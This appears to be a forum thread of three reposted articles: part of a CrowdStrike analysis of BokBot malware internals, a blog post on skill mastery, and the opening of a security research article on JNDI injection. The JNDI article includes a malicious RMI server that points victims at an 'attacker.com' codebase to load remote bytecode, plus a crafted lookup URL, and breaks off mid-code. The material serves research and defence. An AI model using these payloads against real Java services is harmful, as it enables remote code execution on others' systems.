child process by removing the hook from the ZwCreateUserprocess routine, and then the non-hooked ZwCreateUserProcess procedure is called. This will create the child process, but execution doesn’t begin until CreateProcessInternal returns. The rest of the hook routine will decode and inject the embedded BokBot binary into the child svchost.exe process Code Injection Prior to injecting the code, the BokBot PE is decompressed and loaded into the local process memory. Once loaded, the following Windows procedures are used to allocate and write to the svchost child process: After the main BokBot module has been written to the child process, the steps to execute the BokBot code will begin. Code Execution BokBot uses a novel technique to get the code to execute inside of the child process. Using the same APIs as earlier, the dropper hooks RtlExitUserProcess in the child process. Since svchost.exe is launched without arguments, it will terminate immediately. As the process attempts to exit, it will call the hooked RtlExitUserProcess, thus executing the BokBot payload. Figure 2: Executing BokBot with RtlExitUserProcess Hook There is one more task for the hooking routine to complete before CreateProcessInternalW resumes execution. Injecting a Context Data Structure After the BokBot payload is injected into the child process, a context data structure is written to the child process. This context contains all of the data necessary to ensure that BokBot’s main module is able to execute without issue: Windows Procedure Addresses ntdll.ZwAllocateVirtualMemory ntdll.ZwWriteVirtualMemory ntdll.ZwProtectVirtualMemory ntdll.ZwWaitForSingleObject ntdll.LdrLoadDll ntdll.LdrGetProcedureAddress ntdll.RtlExitUserProcess ntdll.ZwCreateUserProcess ntdll.RtlDecompressBuffer ntdll.ZwFlushInstructionCache Load address for payload Path to the dropper binary C2 URLs Project ID This data is collected throughout the lifetime of the dropper process. In addition, a similar structure will be written to the child processes of BokBot as it downloads and execute modules. After injection, CreateProcessInternalW resumes, and the dropper process exits. BokBot’s main module starts the initialization phase. BokBot Initialization Prior to executing the primary loop to communicate with the C2, BokBot goes through several initialization steps to prepare itself for C2 communication. Initialization occurs in the following steps: Remove the RtlExitUserProcess hook Create a memory-mapped file to store logging data Execute BokBot as the logged-on user (if the current process is running as System) Suppress error windows Collect System information Windows version information User SID Member of a domain Unique ID generation Prevent multiple executions Install BokBot on the host Inject existing downloaded modules into into child processes Some of these steps are covered in more details inside the following sections. Silence Errors To prevent error windows from informing the victim of an issue, BokBot sets the error mode of the process to 0x8007, which corresponds to the following: This will disable most error notices that are generated when a process crashes. Generating Unique IDs BokBot uses several unique IDS that are generated earlier on during process execution. These values are passed to the C2 (command and control), used as a key for RC4, and passed to child processes. Project ID In addition to injecting the main BokBot module into svchost, the dropper also injects a chunk of binary data that provides context for BokBot to execute, including the Project ID. These unique Project ID values appear to be used to identify infections that correspond to distribution campaigns. The Project ID is a four-byte value. Bot ID Bot IDs are unique to specific instances for a user on an infected host. The value is used as an encryption key and as a seed in the generation of the unique values that BokBot needs for a variety of purposes, such as the generation of pseudo-random strings for file and event names. This will be discussed further in subsequent sections. The Bot ID is generated in one of the two following ways: Security ID (SID) of the account name System time in a file time format Since both values are 64-bit, no matter which method is used, the value is split into two 32-bit chunks and XORed. ID Hash In addition to this Bot ID, a simple hash is generated that can be used to verify the validity of both the Bot ID and the Project ID. This hash is generated using the Bot ID and the Project ID, in the following manner: This value will be passed along with the Project ID and the Bot ID as part of the C2 URL parameters. If this request is invalid, infected hosts will not receive any instructions from the C2. C2 Hostname Initialization Bokbot contains an encoded list of C2 hostnames that were provided as part of the context data structure that was injected by the dropper. The C2 list within that structure is decoded using a key that was also provided by the context, and then re-encoded using a new key that was generated using an rdtsc instruction, and stored as an array of pointers. Prevent Multiple Executions A unique global named event is generated using the Bot ID. A successful call to CreateEvent is proceeded with a call to GetLastError. If the malware is already executing, the last error is ERROR_ALREADY_EXISTS, and the process exits. Installation During installation, the BokBot dropper binary is written to an installation directory, and a scheduled task is created for persistence. The installation directory is created in the following root directory: c:\ProgramData The installation directory name is unique and generated using the Bot ID. Once the directory is created, the original dropper file is renamed (also using the Bot ID as a seed) and written to the directory. Because the Bot ID is based on system information, using it as a seed ensures that the malware will always generate the same installation path and filename on a particular host. After generating the installation directory name, BokBot needs to generate a filename for the BokBot binary that is going to be written to that directory. The following Python code reproduces the algorithm that BokBot uses to generate the filename, and various other strings. The str_id value in the script is a hard-coded integer that is used with the Bot ID to generate consistent strings. For instance, using a Bot ID of 0x2C6205B3 and str_id of 2 always results in ayxhmenpqgof, but switching to a str_id of 6 results in bwjncm. The following is an example of the installation path: C:\ProgramData\{P6A23L1G-A21G-2389-90A1-95812L5X9AB8}\ruizlfjkex.exe A scheduled task is created to execute at windows logon. The task name is generated in the same manner as the installation directory: Task Name: {Q6B23L1U-A32L-2389-90A1-95812L5X9AB8} Trigger: Logon Action: Start a program Details: BokBot dropper path C2 Communication BokBot communicates with C2 servers via HTTPS requests, passing various values to the server through URL parameters and via POST data. The URL request data is not encrypted or obfuscated beyond the SSL/TLS used by the server. The following sections detail parameters required by all requests, some additional optional parameters, and the bot registration process. Required C2 Request/Response Parameters Every request/response will have these parameters sent to the server. These will provide the C2 with information that identifies the request/response type and to uniquely identify the infected machine: Table 1 describes these parameters in greater detail. Table 1: Required URI Parameters The URL path often changes between versions: For instance, version 100-102 used /data100.php instead of /in.php. Additional C2 Request Parameters BokBot contains a communication thread that loops continuously until the process exits, retrieving instructions from the C2 server. These requests include several additional parameters, detailed in Table 2, in addition to those already described. These parameters are not sent when a machine sends the result of a command issued by the C2, such as when uploading a screenshot. Table 2: Additional BokBot C2 Request URI Parameters The following URL parameters showcase an example of the initial connection to the C2: In this example, there are no web injects, no C2 URLs, and no modules have been downloaded, therefore the highlighted parameters are either zero or empty. An initial timestamp has been generated, and the version number is static. Initial Bot Registration A registration request is combined with the standard C2 URL parameters that are sent to the C2 with each request. After the initial request, the C2 server will send commands back to the victim, signaling it to download web injects, updated C2 hostnames, executable modules, or to perform other tasks. The initial registration URL contains parameters related to system information. The following string is an example: Table 3 describes the registration URI parameters. Table 3: Registration Request URI Parameters The following is an example of a registration request (in red) and a response from the C2 (in blue) containing commands for the infected host: C2 Commands This section will cover the command requests made by the C2. Each command from the C2 takes the following format: The following commands are available in the current version of BokBot: Note that these command ID values may change between versions. As this list demonstrates, BokBot provides operators with a wide variety of options to interact with an infected machine. URL Download Command Handler A lot of commands trigger a command handler function that requires communication with either a C2 URL or another URL specified in the server request arguments. If specified by the request, the data downloaded from the target URL will be written to a DAT. Whether or not the downloaded data is written to a DAT file, it will always be processed by a callback function for one of the following C2 commands: Start a new executable module, restart current executable module Update web injects (either command) Update config Update BokBot Write to a file Download and execute a binary The commands that use the C2 URL hostnames send a d URL parameter, such as the following example: This value is typically set to 0; the file to download is specified by the g parameters. Modules and DAT Files All data received from the C2 that needs to persist between reboots is written out as a DAT file on the infected machine. These files include: Web inject configuration C2 configuration External modules Each file is encrypted and decrypted as needed by either the main module or the child module, using the Bot ID as the key. Each module is given a unique tag. Unique Tag Generation BokBot assigns unique tag values for injected processes, downloaded modules, and the downloaded DAT files. These tags are a convenient method for the executing BokBot process to identify external process resources. Tag generation is simple: 18 – Web injects configuration file, statically defined in the binary 19 – Reporting configuration file, statically defined in the binary 20 – C2 configuration file, statically defined in the binary 33-46 – Downloaded modules to be injected into child processes Assigned as needed in an incremental fashion Not necessarily a unique tag for what the module does During analysis of BokBot, these values will come up on a regular basis, including values to generate a unique filename, as described later. Downloading DAT Files As previously mentioned, DAT files are downloaded based on commands sent from the C2. Once the command is received from the C2, a command handler specific to this command is called to process the request. In response, the infected machine notifies the C2 with the command that it is ready to receive an RC4-encrypted blob from the C2. Figure 3 illustrates the process of commands that download configuration files and modules. Figure 3: C2 Command to Trigger DAT File Download An eight-byte RC4 key is prepended to the data buffer. Prior to writing the BLOB to a file, BokBot decrypts the file, and then re-encrypts it using a new RC4 key based on the Bot ID. Write to a File BokBot creates a new directory under C:\ProgramData to store the DAT files. The directory name is generated using the string generation algorithm described previously. DAT file names are generated using the unique tag value. This value is run through a string generation algorithm (also dependent on the Bot ID), which returns a unique filename for the DAT file. Table 4: Example of BokBot DAT Files Written During Analysis Table 4 references all of the DAT files that were written during the testing process used for writing this blog. In this case, the installation directory is C:\ProgramData\yyyyyyyyiu\. These DAT files are further handled based on the specified type, depending on whether it is an executable module or a data file. Executable Module BokBot has several executable modules that can be downloaded and injected into a svchost.exe child process. Once the relevant DAT file is decoded using RC4, no additional decoding or decompression is necessary for the executable module DAT files. The executable module header contains information necessary to ID the module: The rest of the file contains data necessary to load and execute the module, including the various portions of a PE file along with a custom PE header. Module Injection and Execution Executable modules are injected with a technique similar to the dropper, minus the hook of ZwCreateUserProcess, and the child process start is suspended (CREATE_SUSPENDED). It’s a little closer to traditional process migration with the addition of the RtlExitUserProcess hook. PE Image Loading Because there is no standard PE header, the DAT file has to contain all of the relevant information (virtual sizes, relocations, etc.) to properly map this binary into the child process. This data is part of the header of the DAT file. BokBot builds the binary in local process memory prior to injecting it into the child process. Injection Injection uses the same APIs as the dropper: ZwAllocateVirtualMemory, ZwWriteVirtualMemory, ZwProtectVirtualMemory. After injection the process is resumed using ResumeThread. Execution Context Injection Once again, an execution context structure is written to the child process, prior to execution. Some of the information contained in this context includes: Bot ID Project ID C2 hostnames A URL path format string This keeps everything consistent between the parent and child process. No new unique identifiers need to be generated, all of the encryption keys are going to be the same: same hostnames, and even the same URL path. Consistency between parent and child is necessary for the messages sent between the two, using inter-process communication (IPC). After a module is injected into a child process, the first four bytes of the decrypted DAT file are added to an array, used by BokBot to identify which modules are currently executing. Data Files The other DAT files contain data necessary to either communicate with a C2, or related to web injection. Essentially, these files provide whatever additional data the main BokBot process and the executable modules require to accomplish their job. Config File The config file contains all of the data necessary for the BokBot main module to maintain communication with the C2. Once the file is decrypted using the process-specific RC4 key, no additional decompression or decryption is necessary. Signature Verification Each config file comes with a digital signature block, used to verify the integrity of the C2 hostname data. The signature is verified based on the signature verification method outlined in the obfuscations section. The following is an example C2 configuration, with the signature block in red: Web Inject Files There are multiple web inject files. One contains all of the target URL and hostname data, and the second contains regex patterns, as well as the code to inject. These files are both RC4-encrypted and compressed. These files are not parsed by the main BokBot binary, but rather by the intercepting proxy module. The zeus file magic is verified, a buffer is allocated, and then the files are decompressed. A forthcoming blog post on the proxy module will cover decompression and usage of the web injection configuration files. Communication with Child Processes Memory-mapped files and events are used by BokBot to communicate with all child processes that contain an injected module. Through the process of leveraging named events with CreateEvent, OpenEvent, and OpenFileMapping, the BokBot main module is able to provide additional information to these child processes. Shared Module Log Modules write to the same shared memory-mapped file. The memory-mapped file is created using a shared name between the parent and child processes. Each process that can generate this name can use it to open the memory-mapped file, and to write data to the shared modules log. Further details are covered in the next section, and specific data written will be covered in the separate module descriptions below. The main module is responsible for clearing the log and sending the data to the C2. Module-Specific Communication BokBot’s main module often needs to issue commands to the child processes that contain injected module code. The commands can trigger an update of module-specific data, or instruct the module to perform a specific function, such as harvest data from Outlook. Figure 4 outlines this process, although it will be further explained in the subsequent sections. Figure 4: BokBot Communication Between Parent and Child Processes Event Name Generation In order for the BokBot main modules and the child process to communicate with events, unique names need to be generated and must consistent across all of the processes. Table 5 illustrates BokBot’s approach. Table 5: Event Name Structure These events will be used by the parent and child processes to exchange data. BokBot Main Module This process has the ability to communicate with all of the children of the injected modules. These communication all revolve around commands generated by the C2. Once a command that requires notification of an executable module child process is initiated, a named Q event is opened to ensure that the child process is ready to receive the data. If this Q event does not exist, then the child process has not been started. BokBot injects the target module into a child process, and loops a check to see if the event can be opened. Once the Q event has been successfully opened, BokBot creates a new named R event, creates a memory-mapped file (named M event), writes data to the file, signals the open Q event, and waits for a response from the child process. After the child clears the R event, the memory-mapped file is unmapped, and all handles are closed. BokBot Executable Module After initialization, the child process will create a named Q event and wait until it is signaled by the parent process. Once signaled, the named R event is opened, and the data in the memory-mapped file is processed. Data from the BokBot Parent BokBot’s main module writes some contextual information to the injected module, telling it to perform specific actions. These actions change based on the module receiving the data. The following commands are consistent between modules, but the actions performed may vary: 0xFF00: Process exit with a 0x1122 code 0xFF01: Check web injects or no operation 0xFF02: Update C2 hostnames In addition to a command, relevant data associated with a command is also processed based on whatever instruction the command tells the injected module to accomplish. After the task assigned by the parent process has completed, the memory mapped file is unmapped, the R event is signaled, and all other open events are closed. Obfuscations and TamperProofing Bokbot uses several methods to obfuscate analysis: String obfuscation Encrypted DAT files from the server Signature verification Polymorphism String Obfuscation To make analysis more difficult, significant strings have been XOR encoded using a shifting key algorithm. All encoded strings have the following structure: Here is the algorithm to decode the string (Python): Signature Verification Signature verification occurs under two circumstances: updated C2 urls, and updated BokBot binary. In both cases, the process is the same. The verification function receives two things: a 128-byte signature to verify, and the data to verify. First, BokBot creates an MD5 hash of the data requiring verification. Next, an RSA public key embedded in the executing binary is importing via CryptImportKey. Once the hash is generated and the key imported, CryptVerifySignature is used to verify the signature. This may be an attempt to prevent some third party from taking over or otherwise disrupting the botnet. Polymorphism Everytime BokBot is installed, prior to it being written to the install directory, the .text section of the binary is modified with junk data and the virtual size is updated. A new checksum is generated to replace the current checksum. How CrowdStrike Falcon Prevent™ Stops BokBot Bokbot spawns a svchost child process, injects the main module, and that svchost process spawns and injects into multiple child processes. The process tree in Figure 5 is an example of what BokBot looks like when process blocking is disabled in Falcon Prevent. As can be seen, several malicious child processes were launched by BokBot’s main module located inside of the first svchost process. Figure 5: BokBot Process Tree Without Process Blocking Enabled Without preventions enabled the customer will still be notified of the malicious activity, but no action will be taken to prevent the behavior. Suspicious Process Blocking Falcon has the capability to prevent the execution of BokBot’s main module and all of the child modules. Turning on process blocking in Falcon Prevent kills the BokBot infection at the parent svchost process. Looking at the process tree in the Falcon UI with process blocking enabled, shows an analyst that the svchost process was prevented. The block message (see Figure 7) that occurs with this preventative action explains why this process was terminated. Figure 6: BokBot Process Tree with Process Blocking Enabled Figure 7: BokBot Process Block Message Suspicious process blocking is an example of malware prevention based on behavior. If the malware uses behavior that has not been caught by Falcon’s indicators of activity, then Falcon can also prevent malware execution by leveraging either next-generation AV machine learning ,or intelligence collected by Crowdstrike’s Falcon Intelligence team. In Summary BokBot is a powerful banking trojan that provides attackers with a robust feature set. One of the more unique features of BokBot is the method in which it uses to communicate with it’s child modules. Additional blog posts for BokBot are coming that will contain more information for the downloaded modules. BokBot Hashes The following hashes were used in creation of this blog post. MITRE ATT&CK Framework Mapping Additional Resources Read a Security Intelligence article: “New Banking Trojan IcedID Discovered by IBM X-Force Research.” Read a Talos Blog: “IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution.” Visit Vitali Kremez | Ethical Hacker | Reverse Engineer and read: “Let’s Learn: Deeper Dive into ‘IcedID’/’BokBot’ Banking Malware: Part 1.” Download the 2018 CrowdStrike Services Cyber Intrusion Casebook and read up on real-world IR investigations, with details on attacks and recommendations that can help your organizations get better prepared. Learn more about CrowdStrike’s next-gen endpoint protection by visiting the Falcon platform product page. Test CrowdStrike next-gen AV for yourself: Start your free trial of Falcon Prevent™ today. Sursa: https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/
-
- 1
-
-
The Process of Mastering a Skill In the first part of this mini-series “The Paradox of Choice”, I talked about the psychology behind making choices when overloaded with information. Here I will cover the process of mastering a skill and how to put it into practice in a world full of distractions. This post is inspired by Mastery by Robert Greene and Deep Work by Cal Newport. I highly recommend reading both, as they will help you understand the process of mastering a skill or field. Prodigy or Expert? Have you ever wondered what separates experts from everyone else? I don’t mean the self-proclaimed “experts” who value status over learning. I mean the “geniuses” of our industry who know their field extraordinarily well and have spent decades honing their skills. How do these successful researchers master their field? Is it some natural talent they were born with, or do they have a magic trick that only a few know about? When performance psychologists studied what distinguishes experts across several different fields, they kept coming across the same answer in each field: deliberate practice. In his 1993 paper The Role of Deliberate Practice in the Acquisition of Expert Performance, K. Anders Ericsson stated: We deny that these differences are immutable, that is, due to innate talent. Only a few exceptions, most notably height, are genetically prescribed. Instead, we argue that the differences between expert performers and normal adults reflect a life-long period of deliberate effort to improve performance in a specific domain. K. Anders Ericsson Today we know that it’s not magic. It’s this specific form of practice. If you look at the so-called “geniuses” throughout history, time and again the common factor is not innate talent, but just that they each put countless hours into mastering their craft long before arriving at their respective breakthroughs. Does that mean you can become the next Einstein? Yes. But not if you waste your time with unstructured learning. If you structure your approach to learning, apply solid discipline and rebuild your own brain’s ability to focus, you can achieve truly great things. The trick is to focus on deliberate practice rather than on practice alone. You will read about the difference between the two in section Deep Work, or in my previous blog post on The Importance of Deep Work. In his book The Laws of Human Nature, Greene notes that mastering a skill that matches your interests gives your brain the sense of purpose and direction that it craves. This is important when learning something new, because practice can otherwise be tedious and cognitively demanding. Clear goals let us embrace this process, knowing that the eventual reward will outweigh the sacrifice. This, in turn, makes the process more pleasant. Eventually your mind develops enough discipline to withstand distractions and becomes pleasantly absorbed in the work. This is how we achieve focus and momentum. In this state of flow your brain retains more information and so you learn even faster. It is easy to get overexcited and want to learn many skills all at once. I could do this, I could do that. No, you can’t. You can’t do everything at once, and you are not meant to do everything in life. Focusing on one activity should not frighten you; it should liberate you. Developing solid skills in one area lets you branch out to something else and to combine different skills. If you are someone who gets easily bored, you can follow the path of doing different things, but doing so by mastering each before advancing to the next. Mastering a skill or field is a challenging but fulfilling and rewarding feeling. It takes patience, dedication, and discipline. If you feel like you lack these things, don’t be discouraged. Part of the process is to develop skills like discipline and patience on your way to mastery. Once you have mastered one skill or field, it will be much easier to move on to the next one because you will have developed the brain muscles and the skills that make it easier for you to structure your learning and retain information in a more efficient way. Greene breaks this process down into three stages: “apprenticeship”, the “creative/active” phase, and finally “mastery”. Stage 1: Apprenticeship Apprenticeship is the stage where you learn a wide-range of skills related to your chosen field. In this stage you should identify which skills are the most important to learn and prioritize these, gaining proficiency on a skill-by-skill basis. It is better to learn one skill at a time, rather than trying to multitask and learn them all at once. During this stage it is okay to mirror the techniques of others and try them yourself by, for example, following online tutorials or reinventing well-known tools for yourself. But it is also important to get out of your comfort zone and not shy away from difficult problems or obstacles. Apprenticeship can be the most challenging of the three stages of mastery, but it is also the most important. So here are some things to keep in mind as you are going through this stage: Value learning over money: During this stage, focus on mastery, not money. Be patient and remember that the eventual reward will outweigh the sacrifice. Don’t focus on status. Don’t focus on proving yourself to others and showing off what you know. Instead, focus on teaching other what you have learned. Sharing your knowledge with others by, for example, writing blog posts is a great way of filling your gaps in understanding a subject. If your writing focuses on trying to explain a concept well to the biggest possible audience, you will help develop your own understanding of the skill as well as learn how to explain complex topics to a broader audience. But be careful: if you set out to show-off and sound “smart” in your blog posts you will end up leaving out important context from your posts, fail to admit how you overcame obstacles, and end up putting others off and looking like a jerk. Don’t pay much attention to what others think. If you focus too much on what others think of you, it will make you feel insecure and distract you from learning. Remember: in this stage you are still learning and that’s okay; it doesn’t matter that you’re not an expert yet. If you instead set clear goals and have a sense that you are advancing, you will focus more on the quality of your work. This will also help you distinguish between constructive versus malicious criticism. Keep expanding your horizons: Exchange ideas with people from your industry and hang out in a hacker space or conference every now and then. These experiences and connections all contribute to your learning. Talk to people about your current projects and ask them about theirs rather than trying to show off. Embrace the feeling of inferiority: If you feel like you already know something or have mastered it, you stop learning. Always assume that you are a beginner and that there’s more to learn. There’s always more to learn. A sense of superiority can make you fragile to criticism and too insecure seek help or improve. Trust the process: It takes time. Nobody masters a skill overnight. But this should motivate you rather than discourage you. After all, if mastering a skill was easy, the skill would have little value. Try to align your individual interests in a field to identify a niche that you can dominate. Move toward resistance and pain, avoid the easy path: It is very human to avoid our own weaknesses, and so stretching our mind to its limits can feel uncomfortable. This leads most people to stay in familiar territory rather than advancing to new things. If you want to achieve mastery, you must instead follow the “resistance path”. Pick challenges that are slightly above your skill level to help you advance. Avoid challenges that are either way too far beyond your skill which might discourage you, or those below your skill level which will bore you and cause you to lose focus. Get used to failure and embrace it as a critical part of learning: When a computer program malfunctions, it shows you that you need to improve it. Treat your own failures the same way: as opportunities for improvement. Failures make us tougher and show us how something doesn’t work. Failures are learning opportunities giving you a new experience to learn from. Master the art “what” and the science “how” of everything you do: Get a full understanding of the skill, not just the tools, or one narrow technique. It is totally okay to get familiar with all the tools Kali Linux has to offer, but your aim should be to understand the inner workings behind the techniques that are being used by these tools. Don’t be afraid to “reinvent the wheel” by building your own versions of existing tools–this can also help you to internalize a concept. Advance through trial and error: Be curious! Try out new things! If you wonder if something would work in practice, try it out and see. If it works, great. If not, you’ll have learned why it doesn’t work. Stage 2: Creative-Active The creative/active stage occurs after you’ve established a solid foundation in the skills of your chosen field. In this stage you combine these skills together in new and more interesting ways. Unlike the apprentice stage, where you tried and learned pre-existing techniques, here you combine them to come up with your own and develop your own unique style to execute your craft like nobody else. Some people try to jump straight into this stage and skip the apprenticeship stage. These people usually fail because inventing something new without knowing what’s already out there or having a firm understanding of the basis of the skill is very frustrating and difficult. Often this aspect of mastery can seem scary. You are venturing into places no tutorials exist and trying to use your skills in ways nobody else has before. Stage 3: Mastery The final stage is where all the hours of work finally pay off… Mastery! The entire process can be summarized as follows. Click to enlarge the image. To finally achieve mastery, you’ll need to learn how to manage distractions, how to reach flow, and how to embrace deep work, and recognize that it is deliberate practice, not just hours spent in front of a computer or a book that determines how fast you will achieve mastery. Motivation Each of us knows what it is like to be distracted and be unproductive. We often wait for motivation to strike and inspire us to start our project. But we don’t have to wait for motivation to appear out of nowhere; we can instead induce motivation. In my experience, motivation happens when we start with action, which in turn sparks inspiration, and this inspiration gives us motivation to go further in a self-reinforcing loop. Even once we are motivated to action, it is easy to tinker around without direction or become distracted by social media and phone notifications. If we allow ourselves to get distracted, eventually we will see that time passes quickly, but we don’t get much done. Managing and minimizing distractions is therefore critical to achieving flow and making best use of time. Flow I covered the concept of flow and Deep Work in my blog post The Importance of Deep Work in more detail. Flow is the momentum you reach when you are fully focused on a task and everything seems to flow effortlessly. Flow can be quite addictive. Those who have experienced flow know that it feels like you’re in a meditative state of productivity. It feels calming and gives you a sense of purpose. This rewarding feeling of flow is best described by psychologist Mihaly Csikszentmihalyi: The best moments usually occur when a person’s body or mind is stretched to its limits in a voluntary effort to accomplish something difficult and worthwhile Mihaly Csikszentmihalyi The 25-minute Rule In a study from the University of California Irvine, researchers studied the costs of interrupted work. According to the study, it takes an average of 23 minutes and 15 seconds to get back to the task after being interrupted. Interrupted work also caused participants of this study to experience higher levels of stress, frustration, and mental exhaustion. A good rule of thumb is that it takes about 25 minutes of undistracted focus to reach a state of flow. This means if you’re checking your phone notifications every 20 minutes you will never reach this state. Apps are designed to keep us in front of our screen as much as possible. It’s a battle for attention; a cascading waterfall of notifications. We unlock our phones 80 times per day on average. New versions of Android and iOS have a new “Screen Time” feature. This shows you statistics of how much time you spend staring at your screen, what apps you use the most, and now many times you unlock your phone. Check it out: you might be surprised how much time and focus apps are draining from you each day. Even if we know how much time we waste on our phone, it can still be difficult to battle it and focus on what is important. To help, I will cover some of the apps that help me stay focused at the end of this blog post. Deep Work In Deep Work: Rules for Focused Success in a Distracted World, Newport writes: Professional activities performed in a state of distraction-free concentration that push your cognitive ability to their limit. These efforts create new value, improve your skills, and are hard to replicate. Deep work is hard and shallow work is easier and in the absence of clear goals for your job, the visible busyness that surrounds shallow work becomes self-preserving. Cal Newport In his research Newport discovered that high-performing students exemplified the following rule: Work Accomplished = Time Spent x Intensity This rule is why some students spend all night studying and still struggle, whereas others easily outperform them. I wish I had understood this rule when I was an undergraduate during exams. Only later I realized that time spent “studying” doesn’t make much difference if the time spent is not high-intensity. Once I understood this, I could avoid all-nighters and accomplish far more in much less time. The secret is to systematically increase the intensity levels of your focus by experimenting with various techniques that fit your specific lifestyle and brain. My approach is to split my projects into deep work sessions. I make a list of things I want to accomplish and focus on the task for 90-120 minute periods, followed by a short break, and then repeat. You’d be amazed how much you can get done in a 4 hour block of uninterrupted work. Deliberate practice is purposeful, systematic, and stretches your mind to its limits. It requires focused attention and is performed with the goal of improving performance. Regular practice is basically mindless repetition of the same task. The more we repeat a task, the more mindless it becomes. Mindless activity is the enemy of deliberate practice. You need get used to failure and embrace it as a critical part of learning. Productivity Apps Devices are usually the source of our distractions, but there are a few apps we can use to help increase productivity. Here are some of my favorite apps that I use to reduce distractions when working: Screen Time: If you have an iPhone, use this feature! It tells you the unvarnished truth about your app use. You can set limits on specific apps or categories of apps, like social media. Once you reach the limit, the apps will be disabled. You can re-enable access for another 15 minutes each time you reach your limit. Personally, I limit social media access to 30 minutes per day when I’m not traveling. Trello: I use Trello boards to manage and plan my projects. Trello helps you create project boards, to-do lists, set deadlines, and so on. One of my boards serves as my weekly to-do list and is called “Weekly”. For individual projects I use boards listing different project stages and a to-do list for each. Your project to-do list doesn’t need to detail your entire plan right from the start. Your first project to-do list should instead contain small steps to get your project started. Make it as small as possible, listing 10 items or so. This will help you get started and help you progress step-by-step without getting stuck on what to do next. As you work through your to-do list you will come up with more items and can add them to the list as you go. Try to create to-do list items that represent clear instructions of what to do next, so whenever you look at the list you know exactly how to proceed. For example, suppose that you need to prepare a presentation. A to-do list containing items like “create outline”, “create all graphics”, “create slides” and “finish slides” is too abstract, and you might spend too much time splitting the task up in your head and forgetting what to do next. A better approach would be to split each step into small tasks, such as the following: Create outline Map out the different sections Map out the different subsections Create graphic for slide X Create graphic for slide Y Forest: This is my favorite app, as it is both simple and useful. Whenever I decide to focus on a task for an hour or two, I set my Forest timer and hit “plant” to plant a tree of my choosing. If you switch to another app while the tree is growing, the tree will die. If you manage to avoid switching apps until your period of focus is done, you get a tree and points that can be spent on new types of trees and bushes for your Forest garden. The app is very simple and has the psychological effect of rewarding you for remaining undistracted. It helps make focus a habit and teaches your brain that it’s time to ignore distractions and to focus as soon as you press the “plant” button. Make Deep Work a Habit Don’t just do deep work every now and then. Make it a habit! You need to choose a strategy/philosophy that fits your specific circumstances, as a mismatch can derail your deep work habit before it has a chance to solidify. Here are some strategies I extracted from the book Deep Work: Rules for Focused Success in a Distracted World: Monastic: “This philosophy attempts to maximize deep efforts by eliminating or radically minimizing shallow obligations.” — isolate yourself for long periods of time without distractions; no shallow work allowed. Bimodal: “This philosophy asks that you divide your time, dedicating some clearly defined stretches to deep pursuits and leaving the rest open to everything else.” – dedicate a few consecutive days (like weekends, or a Sunday, for example) for deep work only, at least one day a week. Rhythmic: “This philosophy argues that the easiest way to consistently start deep work sessions is to transform them into a simple regular habit.” – create a daily habit of three to four hours every day to perform deep work on your project. Journalistic: “in which you fit deep work wherever you can into your schedule.” — Not recommended to try out first, since you first need to accustom yourself to deep work. Book Recommendations If you are serious about mastering a skill in your field, I recommend getting some context and reading books that provide you with practical knowledge and put you into the right mindset. Here are some books I highly recommend, ordered by usefulness and importance. Mastery – Robert Greene Deep Work – Cal Newport The Subtile Art of Not Giving a Fuck – Mark Manson The Power of Habit – Charles Dugigg Atomic Habits – James Clear The Paradox of Choice – Barry Schwartz Sursa: https://azeria-labs.com/the-process-of-mastering-a-skill/
-
Exploiting JNDI Injections in Java By Michael Stepankin Research Share this article: Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS). In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading. When the name of the requested object is controlled by an attacker, it is possible to point a victim Java application to a malicious rmi/ldap/corba server and response with an arbitrary object. If this object is an instance of "javax.naming.Reference" class, a JNDI client tries to resolve the "classFactory" and "classFactoryLocation" attributes of this object. If the "classFactory" value is unknown to the target Java application, Java fetches the factory's bytecode from the "classFactoryLocation" location by using Java's URLClassLoader. Due to its simplicity, It is very useful for exploiting Java vulnerabilities even when the 'InitialContext.lookup' method is not directly exposed to the tainted data. In some cases, it still can be reached via Deserialisation or Unsafe Reflection attacks. Example of the vulnerable app: @RequestMapping("/lookup") @Example(uri = {"/lookup?name=java:comp/env"}) public Object lookup(@RequestParam String name) throws Exception{ return new javax.naming.InitialContext().lookup(name); } Exploiting JNDI injections before JDK 1.8.0_191 By requesting "/lookup/?name=ldap://127.0.0.1:1389/Object" URL, we can make the vulnerable server connect to our controlled address. To trigger remote class loading, a malicious RMI server can respond with the following Reference: public class EvilRMIServer { public static void main(String[] args) throws Exception { System.out.println("Creating evil RMI registry on port 1097"); Registry registry = LocateRegistry.createRegistry(1097); //creating a reference with 'ExportObject' factory with the factory location of 'http://_attacker.com_/' Reference ref = new javax.naming.Reference("ExportObject","ExportObject","http://_attacker.com_/"); ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); registry.bind("Object", referenceWrapper); } } Since "ExploitObject" is unknown to the target server, its bytecode will be loaded and executed from "http://_attacker.com_/ExploitObject.class", triggering an RCE. This technique worked well up to Java 8u121 when Oracle added codebase restrictions to RMI. After that, it was possible to use a malicious LDAP server returning the same reference, as described in the "A Journey from JNDI/LDAP manipulation to remote code execution dream land" research. A good code example may be found in the 'Java Unmarshaller Security' Github repository. Two years later, in the Java 8u191 update, Oracle put the same restrictions on the LDAP vector and issued CVE-2018-3149, closing the door on JNDI remote classloading. However, it is still possible to trigger deserialisation of untrusted data via JNDI injection, but its exploitation highly depends on the existing gadgets. Exploiting JNDI injections in JDK 1.8.0_191+ Since Java 8u191, when a JNDI client receives a Reference object, its "classFactoryLocation" is not used, either in RMI or in LDAP. On the other hand, we still can specify an arbitrary factory class in the "javaFactory" attribute. This class will be used to extract the real object from the attacker's controlled "javax.naming.Reference". It should exist in the target classpath, implement "javax.naming.spi.ObjectFactory" and have at least a "getObjectInstance" method: public interface ObjectFactory { /** * Creates an object using the location or reference information * specified. * ... /* public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception; } The main idea was to find a factory in the target classpath that does something dangerous with the Reference's attributes. Looking at the different implementations of this method in the JDK and popular libraries, we found one that seems very interesting in terms of exploitation. The "org.apache.naming.factory.BeanFactory" class within Apache Tomcat Server contains a logic for bean creation by using reflection: public class BeanFactory implements ObjectFactory { /** * Create a new Bean instance. * * 